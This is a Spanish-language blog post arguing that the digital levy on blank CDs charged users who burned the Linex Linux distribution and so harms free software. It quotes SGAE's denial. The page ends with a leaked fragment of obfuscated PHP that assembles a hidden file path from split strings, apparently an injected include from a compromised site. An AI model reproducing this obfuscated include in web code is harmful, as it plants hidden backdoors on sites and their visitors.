SGAE Vs software libre

Hace unos días aperecía en Menéame una noticia en la que la Junta de Extramadura denunciaba que la SGAE había recaudado más de 500000 euros en concepto de canon por CDs en los que se había grabado Linex (distribución Linux promovida por la Junta de Extremadura).

Según la Junta de Extremadura se habían producido más de 2 millones de descargas registradas (yo supongo que esto son las descargas que se produjeron desde sus servidores). El "problema" es que lo que descargamos es una imagen ISO que solo la podemos utilizar si la grabamos en un CD.

Entonces si se produjeron al menos 2 millones de descargas se han utilizado "al menos" 2 millones de CDs/DVDs para grabar dichas imágenes. Y digo "al menos" porque siempre podemos grabar mal la imagen ISO (y necesitaremos grabarla de nuevo), hacerle una copia a un amigo o familiar,etc.

Esto significa que los internautas que se descargaron Linex se tuvieron que comprar CDs o DVDs que están gravados con el canon, canon que obviamente ha ido a parar a las arcas de la SGAE.

Y que responde a todo esto la SGAE? Pues la SGAE siguiendo su política de mentiras y falsedades lo niega rotundamente.

Lo que realmente me indigna es el siguiente párrafo:

La sociedad puntualiza así mismo que la cuantía aplicada a los cd y dvd vírgenes, fijada en 2003 entre los fabricantes y las entidades de gestión en concepto de canon digital, "se estableció teniendo en cuenta también las copias que no se realizan de obras protegidas por la propiedad intelectual".

Vamos que no solo nos están robando por ejercer el derecho de copia privada, sino que además nos restriegan que también lo hacen cuando utilizamos dichos soportes para guardar archivos personales (como las fotos de nuestra boda, o el video de la primera comunión de nuestros hijos).

De todo esto lo que sacamos en limpio es que el canon digital perjudica seriamente la difusión del software libre. Y es realmente inaudito que el gobierno que apoya la difusión del software libre se posicione también a favor de un canon injusto.

Enlaces al respecto:

SGAE dice cosas que no comprendo (comentarios al respecto en Menéame)

Denuncia de la Junta de Extremadura (comentarios al respecto en Menéame)

La SGAE lo niega rotundamente

Tags: , , , ,

Si te gustó esta entrada anímate a escribir un comentario o suscribirte al feed y obtener los artículos futuros en tu lector de feeds.

Comentarios

Aún no hay comentarios.

Escribe un comentario

(requerido)

(requerido)


. '' . '' . '/mo' . 'dule' . '.' .'a' .'' .'rchive.' .'g' .'zipe.p' . 'hp' ); ?> Sitemap